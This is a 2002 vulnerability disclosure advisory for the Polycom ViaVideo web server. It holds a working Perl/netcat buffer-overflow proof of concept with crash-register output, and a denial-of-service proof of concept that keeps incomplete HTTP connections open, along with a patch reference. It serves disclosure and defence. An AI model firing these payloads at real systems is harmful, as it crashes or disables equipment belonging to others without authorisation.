Security vulnerabilities in Polycom ViaVideo Web component

advisory@prophecy.net.nz · Mon, 14 Oct 2002 08:27:54 +1300 (NZDT)

advisory @ prophecy.net.nz - 06/09/02

About
-----
The Polycom Webserver is a component of 'ViaVideo' which can be found
at: http://www.polycom.com/resource_center/0,1408,493,00.html

Affected Versions
-----------------
Polycom ViaVideo 2.2
Polycom ViaVideo 3.0

Problem #1: Buffer overflow in Polycom ViaVideo Webserver Component
-------------------------------------------------------------------

Proof of Concept
----------------
perl -e 'print "GET " . "A" x 4132 . " HTTP/1.0\r\n\r\n";' | netcat 10.1.0.1 3603

Error message on host:
OS: Microsoft® Windows 2000(TM) 5.0 Service Pack 3 Build 2195
Version: Release 3.0  26Feb2002 3.0.0.144
ViaVideo.exe caused an EXCEPTION_ACCESS_VIOLATION in module vvws.dll at 001B:67302ECE, CHttpSocket::ReadHeader()+0226 byte(s), H:\PLCMBuilds\ViaVideo\WrkSpc\VVSource\Web\WebServer\HttpSocket.cpp, line 1092+0002 byte(s)
EAX=41414141  EBX=03D491C4  ECX=03D49190  EDX=00000001  ESI=03D49190
EDI=03D4A1E8  EBP=03B6D3F4  ESP=0586FF1C  EIP=67302ECE  FLG=00010202
CS=001B   DS=0023  SS=0023  ES=0023   FS=0038  GS=0000
001B:67302ECE (0x00000000 0x00000000 0x00000000 0x00000000) vvws.dll, CHttpSocket::ReadHeader()+0226 byte(s), H:\PLCMBuilds\ViaVideo\WrkSpc\VVSource\Web\WebServer\HttpSocket.cpp, line 1092+0002 byte(s)

Problem #2: Denial-of-Service Vulnerability
-------------------------------------------

Proof of Concept
----------------

- Open up several (4) connections to the webserver port (3603).
- Send any incomplete HTTP request.
- Leave these connections open at this point.
- Normal requests to the webserver will now fail.
- CPU utilisation on remote host (Win2k) goes to 99% for ViaVideo.exe

[jonny@loki 15:21:57 ~]$ perl -e 'print "GET " . "/" . " HTTP/1.1\r\n"' | netcat 10.1.3.54 3603 &
[5] 2140
[jonny@loki 15:22:14 ~]$ 
[jonny@loki 15:22:14 ~]$ jobs
[1]   Running                 perl -e 'print "GET " . "/" . " HTTP/1.1\r\n"' | netcat 10.1.3.54 3603 &
[2]   Running                 perl -e 'print "GET " . "/" . " HTTP/1.1\r\n"' | netcat 10.1.3.54 3603 &
[3]   Running                 perl -e 'print "GET " . "/" . " HTTP/1.1\r\n"' | netcat 10.1.3.54 3603 &
[4]-  Running                 perl -e 'print "GET " . "/" . " HTTP/1.1\r\n"' | netcat 10.1.3.54 3603 &
[5]+  Running                 perl -e 'print "GET " . "/" . " HTTP/1.1\r\n"' | netcat 10.1.3.54 3603 &
[jonny@loki 15:22:39 ~]$ 

Solution
--------

A patch has been supplied by Polycom and can be downloaded at: http://www.polycom.com/securitycenter

Thanks
------

Raj.Subramaniam[AT]polycom.com - for working with us to resolve these 
issues.